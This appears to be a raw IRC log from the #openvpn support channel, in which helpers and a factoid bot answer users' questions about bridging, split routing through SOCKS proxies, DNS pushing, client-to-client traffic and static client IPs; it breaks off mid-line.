I would much rather just VPN layer3 traffic 11:23 -!- HyperGlide [~HyperGlid@182.149.50.45] has quit [Remote host closed the connection] 11:24 < pekster> You'll generally need to push the internal DNS along with the domain name via the dhcp-option parameter. And you'd better have some script-fu to get unqualified stuff working 11:24 < pekster> I recommend against using unqualified names anyway if you run split-horizon DNS 11:28 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 11:30 < n00> Okay cool. But regarding the bridged-mode solution, i'm kinda suspecting that my clients don't get a correct route to the IPs on the VPN'ed subnet. As far as I know i don't need to do any route pushing when using bridged, is that correct? 11:33 < pekster> Right, it'll appear as on-link (assuming you fed them the right info via DHCP using --server-bridge or your on-subnet DHCP server, whatever you're using) 11:33 < pekster> You either have a firewall problem, or possibly a clash with the local network on the client side 11:38 < n00> pekster : yep it appears as on link(which is correct?). What could a "clash" be e.g? 11:39 < n00> pekster: btw. will I in a bridged mode, need ip_forwarding? 11:39 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:39 < pekster> rfc1918 is not globally unique; nothing stops a remote LAN from using (part of) the same network 11:41 < pekster> You shouldn't need forwarding unless you want to expose other networks, but most OS's have a knob to allow firewalling on bridges 11:41 < n00> ah okay that kind of clash, that shouldn't be the problem 11:42 < n00> pekster: say i want the VPN client(172.23.23/24) to access a server on 172.22.22/24, and normal workstations on the 23.23 can access the servers. - Would i then need it? 
11:43 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:43 < pekster> !ipforward 11:43 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 11:46 < n00> this might be a silly question, but what about from well.. br to eth? 11:46 < n00> when tap0 and eth1 (access to client network) are bridged in br0 11:48 < pekster> br0 is the interface. Any bridge members are not "interfaces" as far as the OS cares at that point, just physical ports 11:48 < pekster> Think of it like a switch, because that's what you have when you bridge 11:49 < pekster> So no, you don't need to enable L3 forwarding when you've created an L2 device. Maybe your firewall interferes with it, in which case you need to go fix your firewall 11:50 < n00> Okay, thank you very much for your help, I really appreciate it! Have a nice day :) 11:50 < n00> I will probably be back ;) 11:51 -!- n00 [~n00@130.225.74.204] has quit [] 11:55 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 12:00 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has joined #openvpn 12:00 < _d4vid> hello all 12:04 < _d4vid> i have a question .. 12:04 < _d4vid> my english is not so good 12:04 < _d4vid> can anyone speak russian or german? 12:05 < Azrael_-> <- ger, but i'm just a starter 12:06 < _d4vid> so what I want is .. that I don't lose the speed I get from my ISP, so I wanted to somehow limit it to youtube and zatto and a few other sites, so that for those the traffic runs over the VPN and the rest over my ISP 12:08 < _d4vid> I found something on google, e.g. 
like split routing 12:08 < _d4vid> but I don't know much about it 12:17 -!- master_of_master [~master_of@p4FF24B3D.dip.t-dialin.net] has joined #openvpn 12:17 < MacGyver> _d4vid: Is it okay to answer in English? 12:18 < _d4vid> ok sorry 12:18 < MacGyver> _d4vid: Don't apologize. 12:18 < MacGyver> _d4vid: My German isn't good enough to answer you in German. 12:19 < MacGyver> _d4vid: But what you need, if I understand your problem correctly, is to add routes for traffic to youtube, zatto and the other sites to go through the VPN, the tun0-device, but leave all other routes untouched. 12:19 < _d4vid> moment i try it to translate with google.. 12:20 -!- master_o1_master [~master_of@p4FF24C6C.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 12:20 < MacGyver> Everyone else who doesn't speak German: He wants to keep the speed his ISP gives him, and therefore he *only* wants youtube, zatto and a few other sites to go through the VPN. 12:20 < _d4vid> yes that correct ) 12:21 < MacGyver> I don't know if it's easy or even possible to do this, since youtube has a lot of different addresses... Someone else will have to comment on that. 12:22 < _d4vid> ok 12:23 < JacquesBH> Guys, last hour I found a solution for using my VPN for Internet forwarding only... now I want to use the VPN for a network drive... I searched but maybe I do not use the right words... 12:23 * ecrist returns 12:25 <@krzee> JacquesBH, 12:25 <@krzee> network drive is on a machine in server lan? client lan? the server itself? a client itself? 12:26 < JacquesBH> krzee: the server itself 12:27 <@krzee> you dont need to do anything except allow them to reach the share by VPN ip 12:27 < JacquesBH> hum... howto do that? 12:28 <@krzee> unrelated to openvpn 12:28 <@krzee> you only want a client to access the drive, right? 12:29 < JacquesBH> hum right 12:29 < JacquesBH> (sorry i'm on tel... 
-_-) 12:29 <@krzee> so just connect to the share on the server's vpn ip 12:33 <@EugeneKay> _d4vid - You can kind of do what you want if you use two browsers. Set one up to use a SOCKS proxy via the VPN, and just browse the internet normally with the other. 12:33 <@EugeneKay> !routebyapp 12:33 <@vpnHelper> "routebyapp" is if you want to send only certain apps over the VPN you need to run a socks server on the internal VPN subnet (see !sockd) then get an app like proxifier (windows, osx) or tsocks (linux, BSD) to selectively route traffic over the socks proxy based on port/app/subnet or any combination. 12:36 < _d4vid> thanks how do i set that traffic dont use all 12:36 <@EugeneKay> Just use the right web browser for the site you want ;-) 12:37 < JacquesBH> krzee: I think I need to install something like samba on the server, right? 12:37 <@ecrist> or you can use Fuse with SSHFS 12:37 <@krzee> samba needs to listen on the vpn ip 12:38 <@krzee> whether or not that requires configuring samba is for you to know 12:38 < pekster> _d4vid: Browser plugins like "FoxyProxy" for Firefox can use a proxy for specific URLs. You can configure that plugin to send your youtube and other URLs to that proxy and let normal web traffic go out your ISP 12:38 < _d4vid> EugeneKay, so i connect to openvpn and i have all traffic over my eth0 its set automatically 12:38 < JacquesBH> ecrist: but my colleagues are on Windows.. :') 12:39 <@EugeneKay> _d4vid - no; you don't do that at all. Have just one browser connect to a SOCKS proxy via the VPN. 12:39 <@EugeneKay> Everything else goes normally 12:39 <@ecrist> JacquesBH: samba is pretty simple 12:39 < _d4vid> but what i need to change in client config of openvpn? 12:39 <@EugeneKay> You would set up a basic config that just provides networking 12:39 <@EugeneKay> No routing etc 12:43 < _d4vid> EugeneKay, u mean like this howto? http://www.niteoweb.com/blog/openvpn-over-ssh 12:43 <@vpnHelper> Title: OpenVPN over SSH — NiteoWeb Ltd. 
(at www.niteoweb.com) 12:43 <@EugeneKay> Nope. 12:43 <@EugeneKay> Just the basic minimum configuration needed for openvpn's networking 12:48 < _d4vid> ssh -D 127.0.0.1:8080 username ? 12:48 <@EugeneKay> openvpn config, not SSH ;-) 12:48 <@EugeneKay> Just follow the openvpn howto to the point where you can ping the VPN IP of each end 12:56 < _d4vid> openvpn server config or client? 12:57 < _d4vid> but i dont have any rights of openvpn server 13:00 <@ecrist> we can only help server admins, generally 13:01 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:01 < sanfran> i'm on Debian, trying to set up privateinternetaccess, stuck on step 7 https://www.privateinternetaccess.com/pages/client-support/#ubuntu_openvpn 13:01 <@vpnHelper> Title: Client Support Area | Private Internet Access VPN Service (at www.privateinternetaccess.com) 13:02 < pekster> !provider 13:02 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 13:02 < sanfran> my problem is understanding and using the program openvpn. 13:03 < pekster> Not if you're trying to follow directions telling you to use network manager 13:03 < pekster> !netman 13:03 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 13:03 <@ecrist> !ubuntu 13:03 <@vpnHelper> "ubuntu" is dont use network manager! 13:03 < pekster> Ah, I like that one better :) 13:04 <@ecrist> that is one of the oldest factoids in the database 13:04 < sanfran> pekster: could *you* talk to me? 13:04 < pekster> I don't deal with network manager for openvpn. 
I tried it once years ago and it failed miserably at what I wanted it to do 13:05 < sanfran> pekster: great. what do you use? 13:05 < pekster> /usr/sbin/openvpn 13:05 < sanfran> indeed, that's what i'm trying to use. 13:05 <@ecrist> factoid #28 out of 341 current factoids 13:05 < sanfran> as i said before. 13:06 <@ecrist> sanfran: did privateinternetaccess provide you with an openvpn config? 13:06 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has left #openvpn ["http://incloak.com"] 13:07 * sanfran checks for this... 13:07 < sanfran> i have lots of .ovpn files 13:08 < sanfran> i'm assuming it wants East.ovpn since I'm in New England? 13:10 <@ecrist> try any of them with a simple: openvpn --config 13:13 < sanfran> i'm so close now :) but OpenVPN 2.1 requires '--script-security 2' or higher to call user-defined scripts or executables 13:14 <@ecrist> pastebin the config, minus any certificates within 13:17 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 13:19 < sanfran> http://pastebin.com/6UZvgY8j 13:20 <@ecrist> pastebin your client log, please 13:20 <@ecrist> the script-security thing is just a warning 13:21 < sanfran> where is that log? 13:21 < pekster> You'll want a lot at more than 'verb 1' 13:21 < pekster> Make that 'verb 4' or add --verb 4 after the --config command-line 13:21 < pekster> log at* 13:22 <@ecrist> so, openvpn --config --verb 4 --log /tmp/foo.log 13:23 <@ecrist> then your log will be in /tmp/foo.log 13:23 <@ecrist> feel free to look here, too 13:23 <@ecrist> !man 13:23 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 13:32 < sanfran> Fri Mar 8 14:32:54 2013 us=792461 Cannot load CA certificate file ca.crt path (null) (SSL_CTX_load_verify_locations): error:02001002:system library:fopen:No such file or direc$ 13:33 < sanfran> it's because i moved it as su, isn't it? 
13:34 <@ecrist> I asked for the entire log, but, the ca.crt file isn't where it's supposed to be according to the config 13:35 < sanfran> that's the only error, i thought i'd save you the time. 13:35 <@ecrist> usually people think that and they're wrong 13:35 <@ecrist> like your comment about script-security above 13:37 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Quit: nand] 13:37 < sanfran> well, i changed the config to reflect the certs location in /etc/openvpn, seemed like it would work, but now there are new errors. shall i pastebin that log? 13:38 <@ecrist> yes 13:38 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 13:39 -!- levifig [~levifig@spwn.co] has joined #openvpn 13:39 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 248 seconds] 13:39 < sanfran> http://pastebin.com/gJjThXT8 13:40 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 13:41 <@ecrist> are you running this as root? 13:41 -!- zz_AsadH is now known as AsadH 13:41 < sanfran> no. 13:41 <@ecrist> you need to 13:42 < sanfran> XD 13:42 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has joined #openvpn 13:46 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 248 seconds] 13:46 <@ecrist> his VPN must have fired up 13:49 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Quit: Computer has gone to sleep.] 13:50 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:50 < sanfran> did y'all get any of that? 13:50 < sanfran> it seemed to work, at least, it didn't complain. but i couldn't access the internet. 13:51 <@ecrist> log? 13:51 * sanfran facepalm 13:51 < sanfran> look, i'm missing something simple. perhaps the order of connecting? 13:53 < sanfran> http://pastebin.com/qmyufz7Z 13:53 -!- sanfran_ [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 13:53 < pekster> How did you test Internet access? 
If you didn't try a ping by IP you might be losing DNS requests as some ISPs only accept requests from inside clients 13:53 < pekster> Also, that log is not a 'verb 4' and will be of somewhat limited use 13:54 < sanfran> yea, i just tried to go to google.com 13:54 <@ecrist> try pinging 8.8.8.8 or something 13:54 < sanfran> apparently i'm here now too. 13:54 <@ecrist> 13:46:29 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 248 seconds] 13:54 <@ecrist> 13:46:41 <@ecrist> his VPN must have fired up 13:55 < sanfran> so, do everything again? 13:55 < sanfran> am i just not being patient enough? 13:56 < pekster> See my DNS comment above. Provide logs at 'verb 4' if you want more useful information, since it's likely everything is working "just fine" on the VPN, although without knowing things like keepalive status it's hard to even say that 13:57 < sanfran> here goes. 13:58 -!- sanfran__ [~sanfran@216.155.131.76] has joined #openvpn 13:59 < sanfran__> how ya like meh now? 13:59 <@ecrist> ah, looks like you got it running 13:59 < sanfran__> pinging 8.8.8.8 returns fine. 13:59 < sanfran__> how can *you* tell? 14:00 < sanfran__> or are you just guessing by the obscure host? 14:00 < pekster> s/obscure/different/ 14:00 <@ecrist> you used to connect from 209.6.38.16 and now you're coming from 216.155.131.76 14:00 < sanfran__> yay 14:00 < sanfran__> but... how to browse the web? 14:00 -!- sanfran_ [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Read error: Operation timed out] 14:00 -!- sanfran_ [~sanfran@216.155.131.76] has joined #openvpn 14:00 < pekster> Fix your DNS? 14:01 < sanfran__> o, let me kill that. so, i think i'm getting it: i can do things in the tunnel and outside the tunnel? 
14:01 < pekster> Not having seen your logs, I have no clue if your peer is pushing DNS options, bug: 14:01 < pekster> !pushdns 14:01 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 14:01 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 14:01 < pekster> but* (not bug) 14:01 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Read error: Operation timed out] 14:01 -!- sanfran_ [~sanfran@216.155.131.76] has quit [Client Quit] 14:01 -!- sanfran [~sanfran@216.155.131.76] has joined #openvpn 14:01 -!- sanfran [~sanfran@216.155.131.76] has quit [Client Quit] 14:02 < pekster> #4 on that output applies to Linux/Unix systems 14:04 < sanfran__> so, connections that were initiated before the tunnel are outside the tunnel? meaning i could appear to be looking at only cats, but really be looking at cats and dogs? 14:04 -!- sanfran__ is now known as sanfran 14:06 < pekster> No, routing is done per-packet, not per connection 14:06 <@ecrist> connections outside the tunnel will die 14:07 < sanfran> thanks that makes perfect sense. 14:08 < sanfran> i'm still not convinced that my web browser is working right. it seems to know i'm in Boston. 
14:08 <@ecrist> go here: http://www.secure-computing.net/ip.php 14:08 <@vpnHelper> Title: SCN: SCN (at www.secure-computing.net) 14:08 <@ecrist> both with the VPN connected and with it disconnected 14:09 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 14:09 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 14:09 <@ecrist> also, keep in mind location data may be saved in a cookie in your browser, and not based on your IP 14:12 -!- sanfran [~sanfran@216.155.131.76] has quit [Read error: Operation timed out] 14:13 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 14:13 -!- TMcTrain [~kvirc@p54BBB9D2.dip.t-dialin.net] has joined #openvpn 14:14 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Read error: Operation timed out] 14:15 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has joined #openvpn 14:15 < sanfran> the ip does change. but google can still answer "where am i?" with my actual location. what gives? 14:15 <@ecrist> also, keep in mind location data may be saved in a cookie in your browser, and not based on your IP 14:16 < sanfran> yea, snitching. where is that little ba^&*d? 14:16 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:17 < pekster> Google's probably smart enough to use a one-time-use subdomain DNS request to at least return the general area where your DNS server is located too 14:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:17 < pekster> You can use a public DNS such as 8.8.8.8 for google's open resolvers 14:18 < pekster> I suspect that's more likely than google using an old cookie to list where you "used" to appear from when you ask it to find your location now 14:18 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 14:19 < sanfran> pekster: it's just smart enough to know that i didn't move to Sweden, or wherever, in less than a minute? 
14:20 < pekster> WolframAlpha shows me as connecting from VA, US across my SOCKS proxy at AWS across my VPN hosted on my cloud system 14:20 < pekster> I think it's just keying off the IP, although I do redirect my DNS requests through the proxy in that setup 14:21 < sanfran> 0.o 14:21 < pekster> Google gets more confused, apparently 14:22 < pekster> Despite the IP coming from VA, US (for the US East AWS host) it answers the question "Where am I" with LA, CA, US 14:22 < pekster> heh 14:22 < pekster> I'm going to award the better answer in that case to WolframAlpha 14:24 < sanfran> that is weird? 14:24 < sanfran> nix that question mark 14:26 < pekster> For more fun on how easy your browser is to uniquely fingerprint, check out https://panopticlick.eff.org 14:26 <@vpnHelper> Title: Panopticlick (at panopticlick.eff.org) 14:30 -!- Mimiko [~Mimiko@89.28.88.177] has quit [] 14:31 < sanfran> Thanks ya'll. just one more question: am i using SSH here, and if not, where can i read more about doing so? 14:31 < pekster> I don't understand the context for your question. SSH is its own protocol, just like IRC or OpenVPN 14:32 -!- dazo is now known as dazo_afk 14:32 < sanfran> okay, which port am i tunneling through? does that make sense? 14:33 * sanfran needs education 14:33 < pekster> OpenVPN uses port 1194 by convention (and the config file you pasted earlier does indeed use that.) UDP is the default, although OpenVPN can also operate over TCP. It can use any port you want 14:34 < pekster> See the --port and --proto options in the manpage for more info 14:36 < sanfran> cool. i need to change that then, as i often connect at cafes 14:36 < pekster> That should work fine from a wifi cafe 14:36 < pekster> Why would you need to change it? 14:38 < sanfran> I thought most places would only allow 80. 14:39 < sanfran> Like, there's one place that has OpenDNS set up with a parental control. 14:39 < pekster> That doesn't mean they do port-based filtering. 
Most "public" wifi hotspots allow almost anything outbound. Some restrict ports like 25 due to mail spam, but otherwise they're pretty open 14:40 < pekster> If you don't control the server, you can't just "change" the port 14:40 < sanfran> The VPN server, you mean? 14:40 < pekster> Right 14:41 < sanfran> okay 14:41 * sanfran changes it back 14:41 < pekster> You don't want tcp anyway unless you need it: 14:41 < pekster> !tcp 14:42 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 14:43 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 14:46 -!- sanfran_ [~sanfran@108-61-59-19ch.openskytelcom.net] has joined #openvpn 14:48 < sanfran_> lol "Sayreville" 14:48 -!- sanfran [~sanfran@209-6-38-16.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com] has quit [Ping timeout: 245 seconds] 14:59 -!- JSharpe [~JSharpe@46.165.221.13] has quit [Quit: Leaving] 15:11 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has quit [Remote host closed the connection] 15:17 -!- Orbi [~opera@anon-184-33.vpn.ipredator.se] has joined #openvpn 15:26 -!- sanfran_ is now known as sanfran 15:35 -!- wykydtro- is now known as wykydtron 15:41 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 16:12 -!- Orbi [~opera@anon-184-33.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 16:12 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 16:18 -!- zhvtar is now known as abowman 16:21 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 16:36 -!- no0 [~n00@82.211.217.207] has joined #openvpn 16:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit 
[Excess Flood] 16:46 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Quit: Computer has gone to sleep.] 16:49 -!- abowman is now known as zhvtar 16:51 < no0> Hey pekster, you there ? :) 16:54 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 16:55 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 17:01 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 260 seconds] 17:11 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 17:15 -!- lmm [uid6417@gateway/web/irccloud.com/x-hunjxwmdptpgcgmf] has joined #openvpn 17:16 < lmm> hi, I have two clients connecting to a server. Both clients can ping the server, and the server can ping both clients, but the clients can't ping each other. What's the simplest way to make it so all clients see each other as being on the same network? 17:18 < no0> lmm: add the client-to-client setting? 17:18 < lmm> right, just "client-to-client" ? 17:18 < lmm> the howto only seems to cover the more complex case 17:19 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 17:20 < no0> i am quite new to the whole OpenVPN-thing, but try it :) 17:20 < lmm> am doing 17:24 -!- sanfran [~sanfran@108-61-59-19ch.openskytelcom.net] has quit [Ping timeout: 252 seconds] 17:24 < no0> !goal 17:24 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 17:25 < lmm> that looks good, the clients can ping each other 17:25 < no0> !help 17:25 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 17:25 < no0> !welcome 17:25 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? 
see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 17:25 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 17:26 < no0> !topology 17:26 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 17:26 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 17:35 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:38 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 17:50 -!- kothog [~kothog@unaffiliated/kothog] has left #openvpn ["force"] 18:09 -!- AsadH is now known as zz_AsadH 18:14 < no0> !wiki 18:14 <@vpnHelper> "wiki" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN for the Unofficial wiki or (#2) https://community.openvpn.net/openvpn/wiki for the Official wiki 18:26 -!- zhvtar is now known as aaron 18:27 -!- aaron is now known as Guest15815 18:28 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:30 -!- Guest15815 [~zhvtar@unaffiliated/zhvtar] has left #openvpn [] 18:32 < no0> Hi huys, anyone here have time for answering some bridge related questions? 
18:34 < no0> *guys 18:37 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 18:41 -!- no0 [~n00@82.211.217.207] has quit [] 18:43 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 18:45 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 248 seconds] 18:51 -!- md_5 [~md_5@mcdevs/trusted/md-5] has joined #openvpn 18:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 18:55 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 18:58 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 19:06 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 19:15 < lmm> don't ask to ask, just ask 19:17 -!- raidz is now known as raidz_away 19:20 <@ecrist> !ask 19:20 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 19:21 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 19:44 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 276 seconds] 20:30 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 20:39 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 20:47 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 20:53 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 245 seconds] 20:55 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 21:08 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 21:08 -!- Devastator [~devas@186.214.110.30] has quit [Read error: Connection reset by peer] 21:27 -!- matsh [divine@nanogene.org] has quit [Read error: Connection reset by peer] 21:27 -!- matsh [divine@nanogene.org] has joined #openvpn 21:42 < pekster> lmm: see below: 21:42 < pekster> !c2c 21:42 <@vpnHelper> "c2c" is 
"client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things 21:42 <@vpnHelper> behind other clients 21:49 < uberushaximus> !cqc 21:51 <@ecrist> !factoids 21:51 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 22:13 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 248 seconds] 22:15 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 22:31 -!- p3rror [~mezgani@41.140.30.221] has joined #openvpn 22:38 -!- p3rror [~mezgani@41.140.30.221] has left #openvpn ["Leaving"] 22:45 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Ping timeout: 245 seconds] 22:52 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn 22:57 -!- maurer [maurer@terpsichore.ugcs.caltech.edu] has joined #openvpn 22:58 < maurer> Hey, I've got openvpn working, but I'd like to be able to get a client to have a set of ips (in this case forwarding an entire subnet) 22:58 < maurer> Is there a reasonable way to do this? 22:59 < pekster> maurer: you want to route a LAN to the client 22:59 < maurer> I mean, what I need is for the client machine to have x.y.z.1-254 23:00 < maurer> If routing a lan is the way to do that, then sure 23:00 < pekster> You can't do that with tun (since it's effectively a point-to-point interface.) In theory you could do that with tap 23:00 < pekster> Why on earth do you want that? 23:01 < maurer> Really dumb reasons. 23:01 < pekster> Then why do it? It's a very silly thing to want to do 23:03 < maurer> Is there any way to from the client config request a specific IP then? 23:05 < pekster> request one? No. 
You can have the client set one via the --ifconfig command. Or the server can push a static ip via --ifconfig-push. Note that in both of those cases you should avoid using an IP inside the --ifconfig-pool range (that directive is implied when you use --server or --server-bridge) 23:16 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 252 seconds] 23:22 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn --- Day changed Sat Mar 09 2013 00:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 00:25 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn 00:29 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 00:50 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 01:16 -!- Wulf4 is now known as Wulf 01:26 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 01:42 -!- Orbi [~opera@anon-148-191.vpn.ipredator.se] has joined #openvpn 02:19 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 245 seconds] 02:21 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 02:24 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 02:24 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 276 seconds] 02:26 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 02:38 -!- maurer [maurer@terpsichore.ugcs.caltech.edu] has left #openvpn [] 03:01 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn 03:02 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 03:20 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:23 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:28 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 03:30 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:32 -!- pa [~pa@unaffiliated/pa] has quit [Max SendQ exceeded] 03:34 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping 
